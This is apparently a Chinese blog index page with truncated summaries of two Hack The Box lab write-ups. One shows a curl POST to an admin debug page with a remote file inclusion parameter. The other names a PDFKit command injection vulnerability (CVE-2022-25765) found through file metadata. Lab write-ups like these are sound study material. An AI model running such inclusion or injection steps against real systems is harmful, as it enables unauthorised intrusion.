摘要:
web broswer CURL tool visit web with 443 port curl -X POST 'https://streamio.htb/admin/?debug=master.php' -k -b 'PHPSESSID=xxxxx;' -d 'include=http:// 阅读全文
摘要:
常规进行信息收集以及开放端口 访问80进行探测 主页有一个html2pdf的功能 探测一下正常业务看看是否存命令执行等 正常业务下载好文件后,利用exiftools查看该pdf的信息发现发现power by pdfkit v8.6.0 存在CVE-2022-25765 PDFKit.new("htt 阅读全文